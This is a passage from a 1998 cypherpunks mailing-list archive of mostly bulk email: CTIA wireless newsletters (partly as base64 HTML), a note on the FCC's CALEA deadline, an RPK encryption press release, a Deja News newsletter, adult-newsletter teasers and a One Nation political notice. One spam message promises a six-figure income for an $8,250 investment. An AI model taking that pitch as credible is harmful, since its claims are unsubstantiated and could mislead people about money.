cHByb3ZlZCBhbmQgc2V0IGEgcmVjb3JkIGRhdGUKb2YgU2VwdGVtYmVyIDEx
LCAxOTk4IGZvciB0aGUgcHJvcG9zZWQgc3Bpbi1vZmYgb2YgTGVhcCBXaXJl
bGVzcyBJbnRlcm5hdGlvbmFsLApJbmMuICg8QSBIUkVGPSJodHRwOi8vd3d3
Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25ld3MvYm9keV9u
ZXdzLmNmbT9ORVdTX0lEPTM0MDgiPldPVy1DT008L0E+KTwvRk9OVD48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5F
cmljc3NvbiBMb29rcyBUbyBGdXR1cmUKRnVsbC1TY2FsZSBNZXJnZXI8L0ZP
TlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+Q29t
cGFueSBjb25maXJtcyB0aGF0IGl0IGlzIHNlZWtpbmcgdG8KY29uc29saWRh
dGUgaXRzIHBvc2l0aW9uIGluIHRlbGVjb20gaW5kdXN0cnkgdGhyb3VnaCBh
Y3F1aXNpdGlvbnMuICg8QSBIUkVGPSJodHRwOi8vd3d3Lm5hbmRvdGltZXMu
Y29tL25ld3Nyb29tL250bi9iaXovMDkxMDk4L2JpejMwXzE5NjQuaHRtbCI+
TkFORE9USU1FUzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkNvbXB1dGluZyAmYW1wOyBXaXJl
bGVzcwpFeHBlcnRzIEZlYXR1cmVkIG9uIEVkdWNhdGlvbmFsIFByb2dyYW1z
IGZvciBXSVJFTEVTUyBJLlQuIE9jdG9iZXIgMTItMTQKaW4gTGFzIFZlZ2Fz
PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PkNUSUEsIHRoZSBDZWxsdWxhciBUZWxlY29tbXVuaWNhdGlvbnMKSW5kdXN0
cnkgQXNzb2NpYXRpb24sIHRvZGF5IGFubm91bmNlZCBtb2RlcmF0b3JzIGFu
ZCBwYW5lbGlzdHMgZm9yIG1hbnkKb2YgdGhlIGVkdWNhdGlvbmFsIHRyYWNr
cyB0aGF0IGFyZSBwYXJ0IG9mIENUSUEncyBXSVJFTEVTUyBJLlQuIGNvbnZl
bnRpb24KYW5kIGV4cG8uIFdJUkVMRVNTIEkuVC4gKEluZm9ybWF0aW9uIFRl
Y2hub2xvZ2llcykgcnVucyBPY3QuIDEyLTE0IGF0IEJhbGx5J3MKTGFzIFZl
Z2FzLCBhbmQgcmVnaXN0cmF0aW9uIGNhbiBiZSBtYWRlIG92ZXIgdGhlIFdJ
UkVMRVNTIEkuVC4gc2VjdXJlIHNpdGU6CjxBIEhSRUY9Imh0dHA6Ly93d3cu
d2lyZWxlc3NpdC5jb20iPmh0dHA6Ly93d3cud2lyZWxlc3NpdC5jb208L0E+
LiAoPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3By
b2Zlc3Npb25hbC9uZXdzL2JvZHlfbmV3cy5jZm0/TkVXU19JRD0zNDA3Ij5X
T1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPjxGT05UIFNJWkU9KzE+TGF3eWVycyBhbmQgSW5kdXN0cmllcwpQ
cmVwYXJlIEZvciBZMksgTGlhYmlsaXR5IEJhdHRsZXM8L0ZPTlQ+PC9GT05U
PjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+SW5kdXN0cnkgZXhl
Y3V0aXZlcyBhbmQgbGF3eWVycyBwcmVwYXJlCmZvciB0aGUgcG9zc2libGUg
bGF3c3VpdHMgdGhhdCBtYXkgYXJpc2UgZnJvbSB0aGUgWTIwMDAgY29tcHV0
ZXIgcHJvYmxlbS4mbmJzcDsKQXMgbGVnYWwgZ3JvdXBzIHByZXBhcmUsIGNv
cnBvcmF0aW9ucyB3b3JyeS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cud2FzaGlu
Z3RvbnBvc3QuY29tL3dwLXNydi9XUGxhdGUvMTk5OC0wOS8xMS8xNDNsLTA5
MTE5OC1pZHguaHRtbCI+V0FTSFBPU1Q8L0E+KTwvRk9OVD48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5OZXcgWW9y
ayBFeGFtaW5lcyBUaGUKUmlza3Mgb2YgWWVhciAyMDAwIEJ1ZyBvbiBFbWVy
Z2VuY3kgU3lzdGVtczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj5TdGF0ZSBDb21wdHJvbGxlciBub3RlcyA5MTEgc3lz
dGVtIHZ1bG5lcmFiaWxpdHkKdG8gWTJLIEJ1Zy4gKDxBIEhSRUY9Imh0dHA6
Ly9kYWlseW5ld3MueWFob28uY29tL2hlYWRsaW5lcy90Yy9zdG9yeS5odG1s
P3M9di9ubS8xOTk4MDkxMC90Yy8yMDAwXzE1Lmh0bWwiPllBSE9PPC9BPik8
L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05U
IFNJWkU9KzE+R2xvYmFsc3RhciBQcm9qZWN0IFB1dApPbiBIb2xkPC9GT05U
PjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkZhaWxl
ZCBzYXRlbGxpdGUgbGF1bmNoIGRlYWxzIG1ham9yIGJsb3cKdG8gR2xvYmFs
c3RhcidzIGF0dGVtcHQgdG8gcHJvdmlkZSBnbG9iYWwgd2lyZWxlc3MgcGhv
bmUgc2VydmljZS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cud2FzaGluZ3RvbnBv
c3QuY29tL3dwLXNydi93YXNodGVjaC9kYWlseS9zZXB0OTgvZ2xvYmFsc3Rh
cjA5MTE5OC5odG0iPldBU0hQT1NUPC9BPikKKDxBIEhSRUY9Imh0dHA6Ly9p
bnRlcmFjdGl2ZS53c2ouY29tL2FydGljbGVzL1NCOTA1NDM1ODA0ODQwNDI1
NTAwLmh0bSI+V1NKPC9BPikKKDxBIEhSRUY9Imh0dHA6Ly93d3cud2lyZWQu
Y29tL25ld3MvbmV3cy90ZWNobm9sb2d5L3N0b3J5LzE0OTI5Lmh0bWwiPldJ
UkVEPC9BPikKKDxBIEhSRUY9Imh0dHA6Ly93d3cuY2JzLmNvbS9uYXZiYXIv
bmV3cy5odG1sIj5DQlM8L0E+KSAoPEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
ZC5jb20vbmV3cy9uZXdzL2J1c2luZXNzL3N0b3J5LzE0OTU3Lmh0bWwiPldJ
UkVEPC9BPikKKDxBIEhSRUY9Imh0dHA6Ly93d3cudGVjaHdlYi5jb20vd2ly
ZS9zdG9yeS9yZXV0ZXJzL1JFVTE5OTgwOTEwUzAwMDIiPlRFQ0hXRUI8L0E+
KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZP
TlQgU0laRT0rMT5HZW9yZ2UgV2FzaGluZ3RvbiBVbml2ZXJzaXR5Ck9mZmVy
cyBDb3Vyc2Ugb24gU2FmZXR5IElzc3VlcyBhbmQgUmVxdWlyZW1lbnRzIGZv
ciBQQ1MgYW5kIFdpcmVsZXNzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPkNvdXJzZSBvZmZlcmVkIG9uIHNhZmV0eSBp
c3N1ZXMgZm9yIHdpcmVsZXNzCnByb2Zlc3Npb25hbHMgaW5jbHVkZXMgaW5m
b3JtYXRpb24gb24gY3VycmVudCBzdGFuZGFyZHMgYW5kIGhvdyB0aGV5IGFw
cGx5CnRvIG5ldyBnZW5lcmF0aW9uIG9mIFBDUyBhbmQgd2lyZWxlc3MgZXF1
aXBtZW50LiAoPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9wcm9m
ZXNzaW9uYWwvIj5XT1ctQ09NPC9BPikKKDxBIEhSRUY9Imh0dHA6Ly93d3cu
Z3d1LmVkdS9+Y2VlcC8yMTIxLmh0bSI+R1dVLUVEVTwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxI
UiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxG
T05UIFNJWkU9LTE+Rm9yIGFkZGl0aW9uYWwgbmV3cyBhYm91dAp0aGUgd2ly
ZWxlc3MgaW5kdXN0cnktLWluY2x1ZGluZyBwZXJpb2RpYyBuZXdzIHVwZGF0
ZXMgdGhyb3VnaG91dCB0aGUgZGF5LS12aXNpdAo8QSBIUkVGPSJodHRwOi8v
d3d3Lndvdy1jb20uY29tIj5odHRwOi8vd3d3Lndvdy1jb20uY29tLjwvQT48
L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+Q1RJQSBEYWlseSBOZXdzIGZy
b20gV09XLUNPTQppcyB0cmFuc21pdHRlZCB3ZWVrZGF5cywgZXhjZXB0IGZv
ciBob2xpZGF5cy4gVmlzaXQgdXMgb24gdGhlIFdvcmxkIFdpZGUKV2ViIGF0
IDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVzc2lvbmFs
Ij5odHRwOi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Npb25hbDwvQT4uJm5i
c3A7PC9GT05UPjwvRk9OVD4mbmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5JZiB5b3UgYXJlIG5vdCBpbnRl
cmVzdGVkCmluIHJlY2VpdmluZyB0aGUgQ1RJQSBEYWlseSBOZXdzIGZyb20g
V09XLUNPTSwgcGxlYXNlIHNlbmQgYSBtZXNzYWdlIHRvCjxBIEhSRUY9Im1h
aWx0bzp1bmpvaW4tQ1RJQV9EYWlseV9OZXdzX05vbm1lbWJlckB1bTIudW5p
dHltYWlsLmNvbSI+dW5qb2luLUNUSUFfRGFpbHlfTmV3c19Ob25tZW1iZXJA
dW0yLnVuaXR5bWFpbC5jb208L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5i
c3A7Cgo8UD48Qj4qKio8Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxG
T05UIFNJWkU9LTE+IFRoZSB0ZXJtICJ1bmpvaW4tQ1RJQV9EYWlseV9OZXdz
X05vbm1lbWJlckB1bTIudW5pdHltYWlsLmNvbSIKbXVzdCBiZSBsaXN0ZWQg
aW4gdGhlIFRPIHNlY3Rpb24gb2YgdGhlIGVtYWlsLjwvRk9OVD48L0ZPTlQ+
ICoqKjwvQj4mbmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+PEZPTlQgU0laRT0tMT5QbGVhc2UgTm90ZTogU29tZSBvZiB0aGUKbGlu
a3MgaW4gdG9kYXkncyBuZXdzIGFyZSB0aW1lIHNlbnNpdGl2ZS4mbmJzcDsg
VGhvc2UgbGlua3MgbWF5IG5vdCBiZQphdmFpbGFibGUgYXMgbmV3cyBjaGFu
Z2VzIHRocm91Z2hvdXQgdGhlIGRheS4mbmJzcDsgQWxzbywgc29tZSBuZXdz
IHNvdXJjZXMKbWF5IGJlIHN1YnNjcmlwdGlvbi1iYXNlZCBvciByZXF1aXJl
IHJlZ2lzdHJhdGlvbi48L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+
PC9URD4KCjxURD48L1REPgo8L1RSPgo8L1RBQkxFPjwvQ0VOVEVSPgoKPENF
TlRFUj4mbmJzcDs8L0NFTlRFUj4KCjwvQk9EWT4KPC9IVE1MPgo=
--Boundary..3996.1071713804.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qacado1@dallas.net (amz4 ent., inc.)
Date: Fri, 11 Sep 1998 10:37:32 -0700 (PDT)
To: qacado1@dallas.net
Subject: <<DATA BASE CONSULTANTING OPPORTUNITY>>
Message-ID: <199809112222GAA55723@abc.npn.net>
MIME-Version: 1.0
Content-Type: text/plain




PROFESSIONAL CONSULTANTS



Our corporation, through a network of professional
consultants, markets a radical cutting edge  "DATA BASE"
tool to corporations throughout North America that 
in turn, assisted these companies increase their sales
from 10 to 100 percent.

We are seeking a few select key individuals in specific 
geographic areas who will, in association with 
ourselves, offer our program to local companies.

A six figure income is possible in the first year, with
strong residual income in the future years.

There is an $8,250 investment.

To receive a complete package of printed information
by regular mail,  please call  our voice mail system
at:(214)984-3099 and leave your name and address.


Thank you for your time.

  
  

 1-1998
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Balson" <mb2657b@enterprise.powerup.com.au>
Date: Thu, 10 Sep 1998 21:15:52 -0700 (PDT)
To: <Undisclosed.Recipients>
Subject: One Nation tax policy on ABC
Message-ID: <009f01bddd3a$fd9e65e0$f81c64cb@QU.fox.uq.net.ai>
MIME-Version: 1.0
Content-Type: text/plain





Dear One Nation supporter in NSW
 
We anticipate that the ABC's 7.30 Report will 
cover One Nation's discussion document on tax:  "2%EASYTAX" 
tonight.
 
We cannot guarantee how it will be presented but we are 
pleased that the ABC, unlike other Australian media, are apparently giving us 
the opportunity to present our views on why the tax should be 
considered.
 
The tax proposal has not been given a fair go by 
the media so far.
See: <A 
href="http://www.gwb.com.au/tax.htm">http://www.gwb.com.au/tax.htm
 
Global Web Builders
 
 
Scott Balson
Pauline Hanson's Web Master


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 11 Sep 1998 15:12:38 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: LATE BREAKING NEWS! - September 11, 1998 5:30PM EST
Message-ID: <199809112211.RAA20962@revnet4.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




************************************************************

Late today, the FCC released its long-awaited
order extending the October 25, 1998, CALEA
compliance deadline 20 months to June 30, 2000.

The Commission will soon initiate a rulemaking
proceeding to consider whether modifications
to the core J-STD-025 standard may be necessary
to comply with CALEA.

Visit WOW-COM for more details.

http://www.wow-com.com/professional/

Specific News Story is:

http://www.wow-com.com/results/professional/news/frameindex.cfm?articlei
d=3410


************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sat, 12 Sep 1998 01:22:06 -0700 (PDT)
To: (STUFFED SATURDAY SEPTEMBER 12 1998)
Subject:       ---->   http://stuffed.net/98/9/12/   <----
Message-ID: <19980912071001.29383.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/12/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sun, 13 Sep 1998 06:51:37 -0700 (PDT)
To: (STUFFED SUNDAY SEPTEMBER 13 1998)
Subject: COME & GET IT - HOTTEST ISSUE YET!
Message-ID: <19980913121914.16214.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


   IN TODAY'S ISSUE: 30 SUPER-HOT JPEG PHOTOS;
    5 MEGA HOT SEXY STORIES; BAG A BILLIONARE
    BABE; BEST OF EUREKA; WINE, (NAKED) WOMEN
           AND SONG; MAYOR McLAPDANCE;
      CROSS-DRESSING ALIEN ABDUCTORS; DEWEY
       DECIMAL DRACULA DATE; THE NUDE BOMB;
      HAPPY (HOOKER) MEDIUM; VIAGRA SUNRISE;
      BOOB AIR; RELIGIOUS EXPERIENCE; MUCH,
                  MUCH MORE!

       ---->   http://stuffed.net/98/9/13/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/13/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Mon, 14 Sep 1998 02:00:10 -0700 (PDT)
To: (STUFFED MONDAY SEPTEMBER 14 1998)
Subject: HOTTEST ISSUE OF THE SUMMER TO KEEP YOU WARM IF FALL IS HEADING YOUR WAY!
Message-ID: <19980914071000.22081.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


IN TODAY'S ISSUE:

 30 NEW EXTRA HOT JPEGS!
 5 NEW SIZZLING STORIES
 LISTEN TO GET LAID
 BAYWATCH CONFESSIONAL
 DOING THE DRAG KING THING
 PREGO BY PLEASURE
 SEX DRUGS AND ARACHNIDS
 THE BARON OF BALLS
 THE BEST OF EUREKA
 NUCLEAR HARD-ON
 MILLION DOLLAR SHEIK SHAG
             

       ---->   http://stuffed.net/98/9/14/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/14/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deja News Members <dejanews@list.emailpub.com>
Date: Mon, 14 Sep 1998 07:16:15 -0700 (PDT)
To: Deja News Members <dejanews@list.emailpub.com>
Subject: What's New at Deja News
Message-ID: <19980914081041.000172@mulder.emailpub.com>
MIME-Version: 1.0
Content-Type: text/plain


____________________________________________________________

WHAT'S NEW AT DEJA NEWS!                         09/14/1998
____________________________________________________________

Greetings from Deja News! This monthly newsletter is
exclusively for registered Deja News members. It's designed
to let you know about new products and services available
on the Deja News site, so that you can get the most from
your Deja News membership.

We'll be sending this newsletter to your mailbox once
per month as long as you want us to keep sending it.
(Unsubscribe instructions are at the bottom of this email
in the MANAGE YOUR SUBSCRIPTION section.)
____________________________________________________________

If a longer URL below appears broken, please manually cut 
and paste the link into your browser.

NEW THIS MONTH ON DEJA NEWS

NEW CHANNELS. Stunned by the wealth of 50,000+
discussion forums and wondering how to get to them?
Head for Deja News' home page and jump into our
new channels. We've organized thousands of the best
discussion forums into an easy-to-browse directory, so
you can find just what you're looking for in a few clicks.

Start exploring now at:
http://www.dejanews.com/%5Bst_cam=none.none.none.email0914chan%5D/
____________________________________________________________

MEMBER FORUMS. Can't find a discussion forum on your
favorite topic? Then make your own! Start a free discussion
forum on Deja News today for your small business, community
organization, family, or your favorite special interest. It takes
less than five minutes and it's free!

Create one now at:
http://www.dejanews.com/%5Bst_cam=none.none.none.email0914memf%5D/rg_mkgrp.xp
____________________________________________________________

LANGUAGE SEGMENTATION. Habla Espanol? We've segmented 
our discussions so you can easily find them in any of 18 languages.

Have it your way at: 
http://www.dejanews.com/%5Bst_cam=none.none.none.email0914lang%5D/home_ps.shtml
____________________________________________________________

AUTO SIGNATURE. Use My Deja News to keep up with your
favorite groups and post messages? We've added an auto
signature capability so you can automatically append a personal
trailer to each message you post.

Customize yours at: 
http://www.dejanews.com/%5Bst_cam=none.none.none.email0914sig%5D/rg_edit_post.xp
____________________________________________________________

MANAGE YOUR SUBSCRIPTION:
To subscribe to or unsubscribe from this newsletter, 
please visit:
http://www.dejanews.com/%5Bst_cam=none.none.none.email0914sub%5D/rg_edit_personal.xp
and update the Deja News Email option.  Note:  You must be 
logged in to change your status.

QUESTIONS?
Email us at newsletter@dejanews.com.

This newsletter is a free service of Deja News.
Copyright 1998 Deja News, Inc. All rights reserved.
-------------------------------------------------------------
Distributed by Email Publishing Inc. - http://www.emailpub.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack Oswald / CEO / RPK Security" <joswald@rpkusa.com>
Date: Mon, 14 Sep 1998 04:31:09 -0700 (PDT)
To: RPK_Announcements@rpkusa.com
Subject: ANNOUNCEMENT: RPK InvisiMail NOW DISTRIBUTED THROUGH ONLINE RESELLERS
Message-ID: <199809141123.EAA22441@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time in the past your name was submitted to our e-mail mailing list database.  If you do not wish (or no longer wish) to receive announcements, updates and news concerning the RPK Encryptonite Engine or the RPK InvisiMail e-mail security products, please forward this message to remove@rpkusa.com

----------------------------------------------------------------------------------------------


FOR IMMEDIATE RELEASE


CONTACT
Paula Miller				Lyn Oswald
Nadel Phelan, Inc.			RPK Security, Inc.
408-439-5570 x277			212-488-9891
paulam@nadelphelan.com		lynoswald@rpkusa.com


RPK InvisiMail NOW DISTRIBUTED THROUGH ONLINE RESELLERS

Alexa Internet, Parsons Technology and Buyonet International Partner with InvisiMail International Ltd.

SAN FRANCISCO, CA. August 31, 1998 - InvisiMail International Ltd., a specialist in Internet commerce and communications systems, announced today the completion of joint marketing agreements with Alexa Internet, Parsons Technology Inc. and Buyonet International for the RPK InvisiMail e-mail security software product.

	RPK InvisiMail is a standards-based e-mail security add-in for POP3/SMTP Internet e-mail software and Internet gateway servers. RPK InvisiMail is completely transparent, allowing users to easily send and receive private e-mail messages securely over the Internet, without having to learn about cryptography.  RPK InvisiMail was developed using RPK Security Inc.'s core technology, the RPK Encryptonite Engine.

	Alexa, a free Web navigation service, Parsons Technology, a catalog marketer of high quality computing solutions, and Buyonet International, an online software reseller with sales in more than 110 countries, will market and resell RPK InvisiMail products to customers through multiple distribution channels. Alexa's core marketing efforts for InvisiMail include advertising InvisiMail through banner ads and e-mail announcements to Alexa's customers.

	"We are delighted to have established a mutually profitable marketing partnership with RPK Security in support of InvisiMail," said Darian Patchin, director of media and distribution for Alexa Internet. "This partnership brings many benefits and is complementary to our Web navigation tool. RPK InvisiMail offers customers a flexible, easy to use and configurable secure e-mail add-in."

 more
RPK InvisiMail PARTNERS WITH ONLINE RESELLERS	PG. 2 OF 2

	As part of the licensing deal with Parsons Technology, a Broderbund Company, InvisiMail will be branded to reflect the Parsons name.  Parsons(r) RPK InvisiMail will be offered through Parsons Technology direct to consumers, with marketing efforts focusing on catalog exposure, electronic mailings, Parsons' website and other on-line channels. 

	"Parsons Technology has always stood for high quality software at affordable prices.  InvisiMail is no exception.  We are excited to bring this level of protection and ease of use to our customers," said Brian Kristiansen of Parsons Technology.
Buyonet will distribute RPK InvisiMail Intro on the freeware/shareware portion of their online store and will sell RPK InvisiMail Deluxe online.  

	"This new agreement gives us an even larger assortment of e-mail tools," said Buyonet Chairman Tore Helgeson.

ABOUT InvisiMail INTERNATIONAL LTD.
InvisiMail International Ltd., founded in 1997, specializes in secure Internet commerce and communications solutions for a wide range of applications.  An adherence to open communication standards, using a distinctive Proxy Architecture, makes the InvisiMail International approach to security the most flexible available.  Developed using RPK Security, Inc.'s core technology, the RPK Encryptonite Engine, the InvisiMail range of products supports secure message-based applications including Client Services, E-Commerce, EDI and others that require absolute confidentiality and the highest security levels.  This allows the simplest e-mail systems to become the most powerful business and commerce tools.  Contact InvisiMail at www.InvisiMail.com or call +44 1624 611 003.

ABOUT RPK SECURITY
Founded in 1995, RPK Security, Inc. is a technology leader in fast public key cryptography.  Its flagship RPK Encryptonite Engine, a uniquely fast and strong public key encryption technology, is available worldwide in custom hardware and software toolkits on multiple platforms.  Developed from widely accepted security mathematics and techniques, the RPK Encryptonite Engine is easily embedded into new and existing hardware and software applications.  RPK's cryptographic research and product development is based in New Zealand, Switzerland and the U.K, with worldwide sales and marketing operations in San Francisco, CA.  Visit RPK's website at www.rpkusa.com or call (212) 488-9891.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 15 Sep 1998 02:37:10 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 14, 1998
Message-ID: <199809150937.CAA04662@toad.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713804.multipart/mixed"

--Boundary..3996.1071713804.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit



==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

Your company just formed a partnership in a country you
never heard of.  Are you worried about international roaming
fraud?  You should be.  

CTIA's Wireless Security '98 - It's Just Smart Business.
Orlando, Florida  November 9 - 11, 1998 
http://www.wow-com.com/professional  

Team WOW-COM
wowcom@ctia.org
===========================================
 

--Boundary..3996.1071713804.multipart/mixed
Content-Type: application/octet-stream; name="bin00016.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00016.bin"
Content-Description: "_CTIA_Daily_News_19980914a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
